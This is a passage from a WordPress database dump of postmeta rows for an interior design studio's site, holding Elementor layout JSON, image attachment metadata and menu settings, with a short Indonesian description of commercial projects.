fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2360,4657,'_elementor_page_assets','a:0:{}'),(2361,4657,'_wxr_import_has_attachment_refs','1'),(2362,4658,'_wp_attached_file','2022/11/logo-black-1.png'),(2363,4658,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:638;s:6:\"height\";i:140;s:4:\"file\";s:24:\"2022/11/logo-black-1.png\";s:8:\"filesize\";i:9129;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"logo-black-1-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5950;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-black-1-150x140.png\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:313;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-black-1-390x140.png\";s:5:\"width\";i:390;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1967;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"logo-black-1-378x140.png\";s:5:\"width\";i:378;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1684;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"logo-black-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1008;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"logo-black-1-600x132.png\";s:5:\"width\";i:600;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13347;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-black-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2364,30,'_wp_old_date','2022-06-30'),(2365,774,'_wp_old_date','2022-06-30'),(2366,773,'_wp_old_date','2022-06-30'),(2425,662,'_elementor_css','a:6:{s:4:\"time\";i:1668397405;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2427,560,'_edit_lock','1695374218:3'),(2428,560,'_edit_last','1'),(2429,560,'rs_page_bg_color',''),(2430,4673,'_wp_page_template','elementor_header_footer'),(2431,4673,'_elementor_edit_mode','builder'),(2432,4673,'_elementor_template_type','wp-page'),(2433,4673,'_elementor_version','3.6.6'),(2434,4673,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2435,4673,'_elementor_page_assets','a:0:{}'),(2436,4673,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2437,4674,'_wp_page_template','elementor_header_footer'),(2438,4674,'_elementor_edit_mode','builder'),(2439,4674,'_elementor_template_type','wp-page'),(2440,4674,'_elementor_version','3.6.6'),(2441,4674,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2442,4674,'_elementor_page_assets','a:0:{}'),(2443,4674,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2444,4675,'_menu_item_type','post_type'),(2445,4675,'_menu_item_menu_item_parent','4715'),(2446,4675,'_menu_item_object_id','560'),(2447,4675,'_menu_item_object','page'),(2448,4675,'_menu_item_target',''),(2449,4675,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2450,4675,'_menu_item_xfn',''),(2451,4675,'_menu_item_url','');
INSERT INTO `wpev_postmeta` VALUES (2453,42,'_elementor_css','a:6:{s:4:\"time\";i:1668397939;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:7:\"ovaicon\";i:3;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2455,1173,'_elementor_css','a:6:{s:4:\"time\";i:1668397942;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:7:\"ovaicon\";i:1;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2494,4680,'_wp_page_template','elementor_header_footer'),(2495,4680,'_elementor_edit_mode','builder'),(2496,4680,'_elementor_template_type','wp-page'),(2497,4680,'_elementor_version','3.6.6'),(2498,4680,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2499,4680,'_elementor_page_assets','a:0:{}'),(2500,4680,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2501,4681,'_wp_page_template','elementor_header_footer'),(2502,4681,'ova_met_header_version','ova,header-banner'),(2503,4681,'ova_met_footer_version','ova,footer'),(2504,4681,'ova_met_main_layout','global'),(2505,4681,'ova_met_wide_site','global'),(2506,4681,'_elementor_edit_mode','builder'),(2507,4681,'_elementor_template_type','wp-page'),(2508,4681,'_elementor_version','3.8.1'),(2509,4681,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bahaus Commercial Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\\n\\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2510,4681,'_elementor_page_assets','a:0:{}'),(2511,4681,'_wxr_import_has_attachment_refs','1'),(2513,4681,'_edit_lock','1695371902:3'),(2514,4681,'_edit_last','1'),(2515,4681,'rs_page_bg_color',''),(2516,4682,'_wp_page_template','elementor_header_footer'),(2517,4682,'_elementor_edit_mode','builder'),(2518,4682,'_elementor_template_type','wp-page'),(2519,4682,'_elementor_version','3.6.6'),(2520,4682,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2521,4682,'_elementor_page_assets','a:0:{}'),(2522,4682,'_elementor_css','a:6:{s:4:\"time\";i:1668398075;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2523,4683,'_wp_page_template','elementor_header_footer'),(2524,4683,'_elementor_edit_mode','builder'),(2525,4683,'_elementor_template_type','wp-page'),(2526,4683,'_elementor_version','3.6.6'),(2527,4683,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2528,4683,'_elementor_page_assets','a:0:{}'),(2529,4683,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2530,4684,'_wp_page_template','elementor_header_footer'),(2531,4684,'_elementor_edit_mode','builder'),(2532,4684,'_elementor_template_type','wp-page'),(2533,4684,'_elementor_version','3.6.6'),(2534,4684,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2535,4684,'_elementor_page_assets','a:0:{}'),(2536,4684,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2537,4647,'_elementor_css','a:6:{s:4:\"time\";i:1668398399;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2538,4685,'_wp_page_template','elementor_header_footer'),(2539,4685,'ova_met_header_version','ova,header-banner'),(2540,4685,'ova_met_footer_version','ova,footer'),(2541,4685,'ova_met_main_layout','global'),(2542,4685,'ova_met_wide_site','global'),(2543,4685,'_elementor_edit_mode','builder'),(2544,4685,'_elementor_template_type','wp-page'),(2545,4685,'_elementor_version','3.8.1'),(2546,4685,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2547,4685,'_elementor_page_assets','a:0:{}'),(2548,4685,'_wxr_import_has_attachment_refs','1'),(2550,4685,'_edit_lock','1668399564:1'),(2551,4685,'_edit_last','1'),(2552,4685,'rs_page_bg_color',''),(2553,4686,'_wp_page_template','elementor_header_footer'),(2554,4686,'_elementor_edit_mode','builder'),(2555,4686,'_elementor_template_type','wp-page'),(2556,4686,'_elementor_version','3.6.6'),(2557,4686,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2558,4686,'_elementor_page_assets','a:0:{}'),(2559,4686,'_elementor_css','a:6:{s:4:\"time\";i:1668398450;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2560,4687,'_wp_page_template','elementor_header_footer'),(2561,4687,'_elementor_edit_mode','builder'),(2562,4687,'_elementor_template_type','wp-page'),(2563,4687,'_elementor_version','3.6.6'),(2564,4687,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding 